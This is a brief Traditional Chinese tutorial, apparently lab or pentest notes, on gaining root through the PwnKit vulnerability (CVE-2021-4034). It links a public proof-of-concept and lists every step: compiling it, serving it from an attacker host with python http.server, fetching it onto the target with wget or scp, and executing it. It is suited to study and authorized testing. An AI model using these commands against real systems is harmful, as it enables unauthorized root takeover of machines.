當取得一般使用者帳號後，可以透過這個工具，進一步取得 root 權限，進行帳號提權的動作。

• 這漏洞的編號為 CVE-2021-4034，存在於 Linux 作業系統的某些舊版本中，當要作提權的動作時候，可以試試看這個工具。

• 下載 https://github.com/arthepsy/CVE-2021-4034/blob/main/cve-2021-4034-poc.c

• 將檔案下載後更名為 Pwnkit.c ，再透過 GCC 編譯。
  gcc Pwnkit.c -o Pwnkit

• 

• 編譯好後，啟動簡單的 http 服務，將編譯好的 Pwnkit 讓靶機下載。
  sudo python3 -m http.server 80
  

• 先透過 ssh 登入到靶機中，並透過 wget 下載 Pwnkit 工具。
  wget http://192.168.0.18/Pwnkit
  如果有遇到無法直接下載的問題，可以透過 ssh 的方式傳檔案。
  scp ./Pwnkit aleksander@192.168.0.70:/home/aleksander/Pwnkit

• 由 id 的指令，可以得知目前用來登入靶機的帳號 aleksander 沒有 root 權限。
  

• 先將 Pwnkit 授予執行的權限
  chmod +x Pwnkit
  接著執行 Pwnkit，即可取得 root 權限了。
  ./Pwnkit